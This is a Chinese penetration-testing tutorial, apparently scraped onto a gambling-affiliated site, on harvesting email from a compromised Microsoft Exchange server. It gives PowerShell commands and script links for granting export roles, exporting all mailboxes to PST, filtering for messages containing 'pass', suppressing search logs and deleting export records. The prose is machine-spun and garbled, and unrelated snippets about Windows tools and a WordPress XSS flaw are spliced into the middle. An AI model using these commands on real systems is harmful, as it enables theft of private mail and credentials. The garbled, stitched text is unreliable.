渗入基本——从Exchange服务器上搜刮和导出邮件 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

渗入基本——从Exchange服务器上搜刮和导出邮件

申博_安全防护 申博 234次浏览 已收录 0个评论

值得收藏!史上最全Windows安全工具锦集

“工欲善其事,必先利其器。” 近日,深信服安全团队整理了一些常见的PE工具、调试反汇编工具、应急工具、流量分析工具和WebShell查杀工具,希望可以帮助到一些安全行业的初学者。 PE工具篇 PEiD 一款著名的PE侦壳工具,可以检测PE常见的一些壳,但是目前已经无法从官网获得: EXEInfo PE PE侦壳工具,PEiD的加强版,可以查看EXE/DLL文件编译器信息、是否加壳、入口点地址、输出表/输入表等等PE信息: 下载地址:http://www.exeinfo.xn.pl/ Detect It Easy 开源的PE侦壳工具,是一个跨

0x00 媒介

在渗入测试中,假如我们取得了Exchange服务器的治理权限,下一步就须要对Exchange服务器的邮件举行搜刮和导出,本文将要引见经常运用的两种要领,开源4个powershell剧本,分享剧本编写细节。

0x01 简介

本文将要引见以下内容:

· 治理Exchange服务器上邮件的两种要领

· 导出邮件的两种要领

· 搜刮邮件的两种要领

注:本文引见的要领均为powershell敕令。

0x02 治理Exchange服务器上邮件的两种要领

1.先运用PSSession衔接Exchange服务器,进而远程治理邮件

运用PSSession衔接Exchange服务器的敕令:

$User = "test\administrator"
$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

补充:

检察PSSession:

Get-PSSession

断开PSSession:

Remove-PSSession $Session

测试敕令(取得一切邮箱用户):

Get-Mailbox

2.直接在Exchange服务器上实行治理邮件的敕令

测试敕令(取得一切邮箱用户的称号):

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
Get-Mailbox

注:差别Exchange版本对应的治理单位称号差别:

· Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;

· Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;

· Exchange 2013 & 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

补充:治理Exchange邮件的经常运用敕令

参考资料:

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps

(1)取得一切邮箱用户称号:

Get-Mailbox -ResultSize unlimited

默许显现1000个用户,加上-ResultSize unlimited能够取得一切用户

(2)取得一切邮箱的信息,包括邮件数和上次接见邮箱的时候

Get-Mailbox | Get-MailboxStatistics

(3)取得一切OU

Get-OrganizationalUnit

(4)经由过程邮件跟踪日记取得收发邮件的相干信息

参考资料:

https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps

邮件跟踪日记默许保留位置:%ExchangeInstallPath%TransportRoles\Logs\MessageTracking

检察发件人[email protected]从2019年1月1日9:00至今发送的一切邮件的相干信息(包括发件人,收件人和邮件主题):

Get-MessageTrackingLog -Start "01/11/2019 09:00:00" -Sender "[email protected]"

返回的效果很芜杂,个中包括多个事宜:

DSN

· Defer

· Deliver

· Send

· Receive

只挑选出发送事宜,使返回效果更简约:

Get-MessageTrackingLog -EventID send -Start "01/11/2019 09:00:00" -Sender "[email protected]"

统计天天收发邮件数目的剧本:

https://gallery.technet.microsoft.com/office/f2af711e-defd-476d-896e-8053aa964bc5/view/Discussions

须要修正肇端时候和增加加载Exchange powershell治理单位的敕令。

0x03 导出邮件的两种要领

1.运用PSSession竖立衔接并导出邮件

参考资料:

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/new-mailboxexportrequest?view=exchange-ps

(1)将用户增加到角色组”Mailbox Import Export”

这里以用户administrator为例:

New-ManagementRoleAssignment –Role "Mailbox Import Export" –User Administrator

补充:移除的敕令

Remove-ManagementRoleAssignment -Identity "Mailbox Import Export-Administrator" -Confirm:$false

增加后再次检察举行确认:

Get-ManagementRoleAssignment –Role "Mailbox Import Export"|fl user

(2)重新启动Powershell

不然,没法运用敕令New-MailboxexportRequest。

(3)导出邮件并保留

这里给出三个实例:

CVE-2019-16219: WordPress (Core)存储型XSS破绽

漏洞概述 WordPress是最主流的内容管理系统(CMS),占全球CMS市场份额的60.4%,远高于第二的Joomla!(5.2%)。因此,有超过1/3的网站使用WordPress。FortiGuard研究人员近期发现一个WordPress中的存储型XSS 0day漏洞。该0day漏洞是由于WordPress 5.0中新内置的Gutenberg引发的XSS漏洞。该编辑器没有超过过滤Shortcode错误消息中的JavaScript/HTML代码。因此,有Contributor或更高权限的远程攻击者就可以在访问被黑页面的受害者浏览器中执行任意JS/HTML代码。如果受害者有更高权限,比

1.导出指定用户的一切邮件,保留到Exchange服务器的c:\test

$User = "test1"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

2.挑选出指定用户的body中包括单词pass的邮件,保留到Exchange服务器的c:\test

$User = "test1"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst")

3.导出一切邮件,保留到Exchange服务器的c:\test

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")}

导出后会自动保留导出要求的纪录,默许为30天。

假如不想保留导出要求,能够加上参数-CompletedRequestAgeLimit 0

补充:关于导出要求的相干操纵。

检察邮件导出要求:

Get-MailboxExportRequest

删除详细的某个导出要求:

Remove-MailboxExportRequest -RequestQueue "Mailbox Database 2057988509" -RequestGuid 650f52ec-722b-47bb-8e73-d16a17c32129 -Confirm:$false
Remove-MailboxExportRequest -Identity 'test.com/Users/test1\MailboxExport' -Confirm:$false

注:婚配的参数从Get-MailboxExportRequest|fl的效果中取得。

删除一切导出要求:

Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

综上,导出用户test1的特定邮件(body中包括单词pass)到Exchange服务器的c:\test的完成代码已上传至github,地点以下:

https://github.com/3gstudent/Homework-of-Powershell/blob/master/UsePSSessionToExportMailfromExchange.ps1

参数以下:

UsePSSessionToExportMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "test1" -ExportPath "\\Exchange01.test.com\c$\test\" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "{`"(body -like `"*pass*`")`"}"

流程以下:

1.运用PSSession衔接到Exchange服务器 2.推断运用的用户是不是被加入到角色组”Mailbox Import Export” 假如未被增加,须要增加用户 3.导出邮件并保留至Exchange服务器的c:\test,花样为pst文件 4.假如新增加了用户,那末会将用户移除角色组”Mailbox Import Export” 5.消灭PSSession

导出的pst文件运用Outlook翻开即可。

2.在Exchange服务器上直接导出邮件

(1)增加治理单位

差别Exchange版本对应的治理单位称号差别:

· Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;

· Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;

· Exchange 2013 & 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

不须要斟酌角色组,能够直接导出邮件。

(2)导出邮件

导出用户test1的邮件,保留到Exchange服务器的c:\test:

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
$User = "test1"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

参照1中的功用,导出用户test1的特定邮件(body中包括单词pass)到Exchange服务器的c:\test的完成代码已上传至github,地点以下:

https://github.com/3gstudent/Homework-of-Powershell/blob/master/DirectExportMailfromExchange.ps1

参数以下:

DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013

注:须要指定Exchange版本。

流程以下:

1.增加治理单位 2.导出邮件并保留至Exchange服务器的c:\test,花样为pst文件。

导出的pst文件运用Outlook翻开即可。

0x04 搜刮邮件的两种要领

1.运用PSSession竖立衔接并搜刮邮件

基础流程同导出邮件类似,区分在于角色组”Mailbox Import Export”须要更换成”Mailbox Search”

完成代码已上传至github,地点以下:

https://github.com/3gstudent/Homework-of-Powershell/blob/master/UsePSSessionToSearchMailfromExchange.ps1

从用户test1中搜刮包括单词pass的邮件并保留到用户test2的out2文件夹,参数以下:

UsePSSessionToSearchMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "test1" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "out2"

导出的效果以下图:

渗入基本——从Exchange服务器上搜刮和导出邮件

搜刮一切包括单词pass的邮件并保留到用户test2的outAll文件夹,参数以下:

UsePSSessionToSearchMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "All" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "outAll"

导出的效果以下图:

渗入基本——从Exchange服务器上搜刮和导出邮件

2.在Exchange服务器上直接搜刮邮件

基础流程同导出邮件类似,在详细敕令上存在一些区分。

完成代码已上传至github,地点以下:

https://github.com/3gstudent/Homework-of-Powershell/blob/master/DirectSearchMailfromExchange.ps1

从用户test1中搜刮包括单词pass的邮件并保留到用户test2的out2文件夹,参数以下:

DirectSearchMailfromExchange -MailBox "test1" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "out2" -Version 2013

搜刮一切包括单词pass的邮件并保留到用户test2的outAll文件夹,参数以下:

DirectSearchMailfromExchange -MailBox "All" -Filter "*pass*" -TargetMailbox "test2" -TargetFolder "outAll" -Version 2013

补充:搜刮邮件的经常运用敕令

(1)罗列一切邮箱用户,显现包括关键词pass的邮件的数目。

Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -EstimateResultOnly

(2)搜刮邮箱用户test1,显现包括关键词pass的邮件的数目。

Search-Mailbox -Identity test1 -SearchQuery "*pass*" -EstimateResultOnly

示例以下图,数目为4个。

渗入基本——从Exchange服务器上搜刮和导出邮件

(3)罗列一切邮箱用户,导出包括关键词pass的邮件至用户test2的文件夹out中(不保留日记):

Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -TargetMailbox "test2" -TargetFolder "out" -LogLevel Suppress

(4)搜刮邮箱用户test1,导出包括关键词pass的邮件至用户test2的文件夹out中(不保留日记):

Search-Mailbox -Identity test1 -SearchQuery "*pass*" -TargetMailbox "test2" -TargetFolder "out" -LogLevel Suppress

0x05 小结

本文引见了治理Exchange邮件的两种体式格局:在Exchange服务器上直接挪用治理单位和运用PSSession竖立衔接并远程治理邮件,离别引见了对应的导出和搜刮邮件的要领,开源4个powershell剧本,分享剧本编写细节。

原文地点: https://www.4hou.com/technology/20718.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明渗入基本——从Exchange服务器上搜刮和导出邮件
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址